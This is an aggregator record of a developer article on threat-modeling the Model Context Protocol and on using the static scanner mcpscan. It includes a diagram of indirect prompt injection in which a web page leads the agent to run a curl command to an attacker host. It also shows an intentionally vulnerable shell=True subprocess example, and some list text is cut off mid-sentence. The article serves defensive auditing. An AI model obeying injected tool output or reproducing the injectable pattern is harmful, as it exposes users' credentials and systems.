{"slug": "threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan", "title": "Threat Modeling the Model Context Protocol: Securing Agentic Tools with mcpscan", "summary": "A developer has released mcpscan, a lightweight static supply-chain security scanner built specifically for Model Context Protocol (MCP) servers and Claude Code projects. The tool audits MCP server implementations and local configurations for command injection, hardcoded secrets, and excessive permission scope, emitting SARIF 2.1.0 or JSON reports. The work outlines MCP's client-host-server threat model, including indirect prompt injection and credential exfiltration risks from over-privileged tools.", "body_md": "The Model Context Protocol (MCP) has emerged as an open standard connecting LLM interfaces (such as Claude Desktop and Claude Code) to local and remote execution environments. By allowing models to execute system tools, query databases, and parse filesystems, MCP bridges the gap between passive text generation and active agentic execution.\n\nHowever, granting AI agents execution capabilities introduces direct attack vectors against host environments. Because MCP servers execute locally with user-level privileges, compromised or improperly sanitized tools can lead to arbitrary code execution, indirect prompt injection, credential exfiltration, and privilege escalation.\n\nThis article breaks down the threat model of the Model Context Protocol, analyzes primary attack vectors, and demonstrates static analysis auditing using **mcpscan**.\n\n``` php\ngraph TD\n    User([User Prompt]) --> Client[MCP Client / Claude Engine]\n    Client -->|JSON-RPC via stdio/SSE| Host[MCP Host Environment]\n    Host --> Server1[Local System Tools / CLI]\n    Host --> Server2[Remote File / Database API]\n    Server2 -->|Untrusted External Data| Client\n    style Client fill:#1f2937,stroke:#4b5563,color:#fff\n    style Host fill:#111827,stroke:#374151,color:#fff\n    style Server1 fill:#1f2937,stroke:#4b5563,color:#fff\n    style Server2 fill:#1f2937,stroke:#4b5563,color:#fff\n```\n\nMCP operates on a client-host-server architecture where host applications communicate with servers via JSON-RPC over `stdio` or Server-Sent Events (SSE).\n\nUnlike REST APIs that rely on strict schema validation and deterministic caller authorization, MCP sits directly beneath an LLM reasoning engine. This architecture introduces unique operational vulnerabilities.\n\nWhen an MCP tool fetches untrusted external data (such as parsing a webpage, reading an email header, or scanning a git commit), malicious payloads embedded in that data can manipulate the client model's context window.\n\n```\nsequenceDiagram\n    autonumber\n    actor User\n    participant Client as MCP Client\n    participant Server as MCP Tool (Web Reader)\n    participant Attacker as External Target Site\n\n    User->>Client: Fetch summary of target site\n    Client->>Server: Call `read_url(\"http://target.site\")`\n    Server->>Attacker: HTTP GET\n    Attacker-->>Server: HTML containing hidden payload\n    Server-->>Client: Returns payload in context\n    Note over Client: Payload instructs LLM to execute:<br/>`run_command(\"curl https://attacker.com/leak\")`\n    Client->>Server: Executes unauthorized tool call\n```\n\nMany community MCP servers wrap CLI tools (such as `git`, `docker`, or `kubectl`). Passing unsanitized LLM parameters directly into subshells creates classic command injection vectors:\n\n``` python\n# Vulnerable execution pattern in MCP tool\nimport subprocess\n\ndef run_git_status(repo_path: str):\n    # Passing unvalidated string with shell=True allows injection\n    return subprocess.check_output(f\"git -C {repo_path} status\", shell=True)\n```\n\nConfigurations stored in `.claude/claude_desktop_config.json` often contain API keys, connection strings, or unrestricted root filesystem mounts (`/`). Over-privileged tools can read local state and transmit tokens to external endpoints via logging or network side-channels.\n\nTo audit MCP server implementations and local environment configurations before deployment, we use **mcpscan**: a lightweight, static supply-chain security scanner built specifically for MCP servers and Claude Code projects.\n\n``` php\nflowchart LR\n    Target[Target Repository / Config] --> Scanner[mcpscan Engine]\n    Scanner --> Rules{Rule Evaluation}\n    Rules -->|Pattern Matching| Rule1[MCP001: Command Injection]\n    Rules -->|Static Pattern Match| Rule2[MCP005: Hardcoded Secrets]\n    Rules -->|Config Scope Check| Rule3[MCP004: Excessive Permission Scope]\n    Rule1 --> Output[SARIF 2.1.0 / JSON Report]\n    Rule2 --> Output\n    Rule3 --> Output\n    style Scanner fill:#0f172a,stroke:#38bdf8,color:#fff\n    style Output fill:#1e293b,stroke:#475569,color:#fff\n```\n\n`eval`), and improper deserialization using regex-based rule matching over source lines — no full AST parse required, which is part of how it stays dependency-free.`.claude/` and `.mcp/` JSON files for exposed secrets and over-broad directory access.\nmcpscan ships well over a dozen rules (run `mcpscan --list-rules` for the full, current list). Five representative categories:\n\n| Rule ID | Category | Detection Focus | Severity | \n|---|---|---|---|\n| **MCP001** | Command Injection | Unsanitized `subprocess` calls with`shell=True` or`os.system()` | High | \n| **MCP002** | Tool Poisoning | Prompt-injection phrasing hidden in MCP tool descriptions/metadata | High | \n| **MCP004** | Over-privileged Scope | Over-broad permissions in Claude Code / MCP configuration | High | \n| **MCP005** | Credential Leakage | Secrets committed into MCP / Claude configuration files | High | \n| **MCP009** | Unsafe Deserialization | Usage of `pickle.loads()` ,`yaml.unsafe_load()` , or unsafe`eval()` | High | \n\nTo run `mcpscan` against an MCP server repository or local configuration:\n\n```\n# Clone the scanner\ngit clone https://github.com/glatinone/mcpscan.git\ncd mcpscan\n\n# Scan a target MCP server codebase\npython3 -m mcpscan /path/to/target-mcp-server\n\n# Audit every known local MCP client config on this machine\n# (Claude Desktop, Claude Code, Cursor, VS Code, Windsurf) in one pass\npython3 -m mcpscan --discover --format json\n```\n\nIntegrate `mcpscan` directly into GitHub Actions to scan every pull request and upload findings to GitHub Code Scanning:\n\n```\nname: MCP Security Scan\n\non:\n  push:\n    branches: [ main ]\n  pull_request:\n    branches: [ main ]\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    permissions:\n      security-events: write\n      contents: read\n\n    steps:\n      - name: Checkout Code\n        uses: actions/checkout@v4\n\n      - name: Set up Python\n        uses: actions/setup-python@v5\n        with:\n          python-version: '3.11'\n\n      - name: Run mcpscan\n        run: |\n          git clone https://github.com/glatinone/mcpscan.git /tmp/mcpscan\n          PYTHONPATH=/tmp/mcpscan python3 -m mcpscan . --format sarif --output results.sarif\n\n      - name: Upload SARIF report\n        uses: github/codeql-action/upload-sarif@v3\n        if: always()\n        with:\n          sarif_file: results.sarif\n```\n\nWhen authoring MCP servers, enforce these core defensive boundaries:\n\n`subprocess.run([\"git\", \"status\"], shell=False)`).\nAs agentic workflows scale, securing tool interfaces requires applying the same static analysis and threat modeling rigor used in traditional software engineering. `mcpscan` offers an automated, open-source path toward verifying MCP servers before execution.", "url": "https://wpnews.pro/news/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan", "canonical_source": "https://dev.to/kielltampubolon/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan-30gc", "published_at": "2026-10-04 02:17:46+00:00", "updated_at": "2026-10-04 02:37:41.991662+00:00", "lang": "en", "topics": ["ai-agents", "ai-safety", "agent-protocols", "developer-tools", "ai-tools"], "entities": ["Model Context Protocol", "mcpscan", "Claude Desktop", "Claude Code", "Anthropic"], "also_reported_by": [], "alternates": {"html": "https://wpnews.pro/news/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan", "markdown": "https://wpnews.pro/news/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan.md", "text": "https://wpnews.pro/news/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan.txt", "jsonld": "https://wpnews.pro/news/threat-modeling-the-model-context-protocol-securing-agentic-tools-with-mcpscan.jsonld"}}